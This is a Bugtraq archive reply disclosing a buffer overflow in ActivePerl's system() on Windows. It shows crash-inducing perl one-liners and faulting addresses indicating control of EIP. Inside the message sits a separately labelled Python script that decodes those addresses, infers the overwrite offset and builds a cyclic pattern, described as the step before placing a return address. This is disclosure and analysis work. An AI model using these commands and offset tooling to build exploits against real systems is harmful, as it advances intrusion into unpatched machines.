Bugtraq mailing list archives
Re: Buffer Overflow in ActivePerl ?
From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Wed, 19 May 2004 01:29:41 +1200
"Oliver () greyhat de" <Oliver () greyhat de> wrote:
I played around with ActiveState's ActivePerl for Win32, and crashed Perl.exe with the following command:

  perl -e "$a="A" x 256; system($a)"
Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus all but last week's security patch:

  perl -e "$a="A" x 256; system($a)"

  perl.exe - Application error
  Unhandled instruction at "0x77fcc83d" referenced memory at "0x00657865". The memory could not be "written".

Also, it is likely exploitable -- push up the number of A's a bit:

  C:\>perl -e "$a="A" x 259; system($a)"

  perl.exe - Application error
  Unhandled instruction at "0x77fcc83d" referenced memory at "0x65004141". The memory could not be "written".

and we seem to get control of EIP. Coincidence? Try yet two more:

  C:\>perl -e "$a="A" x 261; system($a)"

  perl.exe - Application error
  Unhandled instruction at "0x77fcc83d" referenced memory at "0x41414141". The memory could not be "written".

Looks like full control of EIP...

However, there is not likely to be a privilege escalation here unless perhaps a script processor on a web server can be cajoled into doing something with this?? (Not at all familiar with the innards of Windows web servers and their relationship to their CGI, etc. processors...)

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
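The three faulting addresses quoted above decode, byte by byte, into the tail of the string handed to system(): 0x00657865 is "exe\0", 0x65004141 is "AA\0e" and 0x41414141 is "AAAA" in little-endian memory order, which is why the "Coincidence?" is rhetorical. The script below is an added example, not code from the thread or from ActivePerl. It decodes each address, counts how many of its bytes came from the 'A' fill, and works out at which offset the string reaches the overwritten slot (257 for these runs, under the assumption, not verified against perl.exe, that the string is copied contiguously onto the stack and that the slot is the saved return address the post calls EIP). It then shows the cyclic-pattern technique that gets the same offset from a single crash; simulate_crash is a constructed stand-in for the real fault and does not run perl.exe.

```python
"""Decode the crash values from the post and infer the overwrite offset.

Added example, not part of the original thread.  The offset it reports is
derived from the quoted addresses under the assumption that the argument to
system() was copied contiguously and that the overwritten slot is the saved
return address (EIP); this has not been checked against perl.exe itself.
"""
import string
import struct

# Faulting addresses from the post, keyed by the number of 'A's passed to system().
CRASHES = {256: 0x00657865, 259: 0x65004141, 261: 0x41414141}
FILL = 0x41  # 'A'


def le_bytes(value):
    """The four bytes of a 32-bit value in memory order (x86 is little-endian)."""
    return struct.pack("<I", value)


def controlled_low_bytes(value, fill=FILL):
    """Count consecutive fill bytes starting from the lowest address of the value.

    A string overflowing into a stack slot fills it from its low address up,
    so the run of fill bytes at the bottom of the value shows how far the
    string reached into the slot before its NUL terminator.
    """
    n = 0
    for b in le_bytes(value):
        if b != fill:
            break
        n += 1
    return n


def infer_offset(crashes, fill=FILL):
    """0-based offset of the first input byte that lands in the overwritten slot.

    Partial overwrites (1-3 controlled bytes) pin the offset exactly: the
    last n bytes of the string are the low n bytes of the slot.  A fully
    controlled value (4 bytes) only bounds the offset from above, because
    the string may extend past the slot.  Returns None if the runs disagree
    or none of them reached the slot.
    """
    exact = set()
    upper_bound = None
    for length, value in crashes.items():
        n = controlled_low_bytes(value, fill)
        if n == 0:
            continue  # the string stopped short of the slot
        if n == 4:
            bound = length - 4
            upper_bound = bound if upper_bound is None else min(upper_bound, bound)
        else:
            exact.add(length - n)
    if len(exact) != 1:
        return None
    (offset,) = exact
    if upper_bound is not None and offset > upper_bound:
        return None  # the runs contradict each other
    return offset


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1...): non-repeating 4-byte windows,
    so a single crash value maps back to one offset instead of needing
    several runs with different counts of 'A'."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, value):
    """Offset of a crash value (read little-endian) inside the pattern, or -1."""
    return pattern.find(le_bytes(value))


def simulate_crash(pattern, offset):
    """Constructed stand-in for the real fault: return what a 32-bit slot at
    `offset` would hold after `pattern` was copied over it.  Does not touch
    perl.exe; it only exists so the offset lookup can be demonstrated offline."""
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


if __name__ == "__main__":
    for length, value in sorted(CRASHES.items()):
        print(f"{length} x 'A' -> {value:#010x} = {le_bytes(value)!r}, "
              f"{controlled_low_bytes(value)} controlled byte(s)")
    print("inferred offset of the overwritten slot:", infer_offset(CRASHES))
    pat = pattern_create(300)
    eip = simulate_crash(pat, 257)
    print(f"cyclic pattern crash value {eip:#010x} -> offset {pattern_offset(pat, eip)}")
```

With the post's three runs the partial overwrite at 259 bytes is what fixes the offset (257); the 261-byte run only confirms it is not larger. Sending pattern_create(300) instead of a run of A's would have given the same answer from the first crash, which is the usual next step before trying to place an address in those four bytes.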
Current thread:
- Buffer Overflow in ActivePerl ? Oliver () greyhat de (May 17)
- Re: Buffer Overflow in ActivePerl ? rich . sf (May 18)
- RE: [Full-Disclosure] Re: Buffer Overflow in ActivePerl ? Bill Royds (May 18)
- Re: Buffer Overflow in ActivePerl ? Josh Tolley (May 18)
- Re: Buffer Overflow in ActivePerl? Axel Beckert (May 18)
- Re: Buffer Overflow in ActivePerl ? Nick FitzGerald (May 18)
- <Possible follow-ups>
- Re: Buffer Overflow in ActivePerl ? noderat (May 18)
- RE: Buffer Overflow in ActivePerl ? Drew Copley (May 18)
- Re: Buffer Overflow in ActivePerl ? David Cantrell (May 19)
- Re: Buffer Overflow in ActivePerl ? David Ahmad (May 19)
- Re: Buffer Overflow in ActivePerl ? David Cantrell (May 19)
- Re: Buffer Overflow in ActivePerl ? rich . sf (May 18)